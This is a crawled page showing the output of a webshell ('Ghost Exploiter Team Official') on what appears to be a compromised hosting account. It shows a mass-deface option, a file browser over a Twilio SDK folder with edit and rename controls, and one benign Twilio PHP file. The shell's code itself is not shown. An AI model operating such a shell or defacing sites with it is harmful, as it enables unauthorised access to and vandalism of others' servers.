webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
twilio
/
sdk
/
src
/
Twilio
/
Rest
/
Sync
/
V1
/
Service
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
Document
--
ren
SyncList
--
ren
SyncMap
--
ren
SyncStream
--
ren
DocumentContext.php
4.672KB
edt
ren
DocumentInstance.php
4.903KB
edt
ren
DocumentList.php
5.536KB
edt
ren
DocumentOptions.php
5.946KB
edt
ren
DocumentPage.php
1.164KB
edt
ren
SyncListContext.php
5.176KB
edt
ren
SyncListInstance.php
5.069KB
edt
ren
SyncListList.php
5.507KB
edt
ren
SyncListOptions.php
5.108KB
edt
ren
SyncListPage.php
1.164KB
edt
ren
SyncMapContext.php
5.131KB
edt
ren
SyncMapInstance.php
5.039KB
edt
ren
SyncMapList.php
5.481KB
edt
ren
SyncMapOptions.php
5.021KB
edt
ren
SyncMapPage.php
1.158KB
edt
ren
SyncStreamContext.php
4.387KB
edt
ren
SyncStreamInstance.php
4.729KB
edt
ren
SyncStreamList.php
5.464KB
edt
ren
SyncStreamOptions.php
3.849KB
edt
ren
SyncStreamPage.php
1.176KB
edt
ren
<?php /** * This code was generated by * \ / _ _ _| _ _ * | (_)\/(_)(_|\/| |(/_ v1.0.0 * / / */ namespace Twilio\Rest\Sync\V1\Service; use Twilio\Http\Response; use Twilio\Page; use Twilio\Version; class SyncListPage extends Page { /** * @param Version $version Version that contains the resource * @param Response $response Response from the API * @param array $solution The context solution */ public function __construct(Version $version, Response $response, array $solution) { parent::__construct($version, $response); // Path Solution $this->solution = $solution; } /** * @param array $payload Payload response from the API * @return SyncListInstance \Twilio\Rest\Sync\V1\Service\SyncListInstance */ public function buildInstance(array $payload): SyncListInstance { return new SyncListInstance($this->version, $payload, $this->solution['serviceSid']); } /** * Provide a friendly representation * * @return string Machine friendly representation */ public function __toString(): string { return '[Twilio.Sync.V1.SyncListPage]'; } }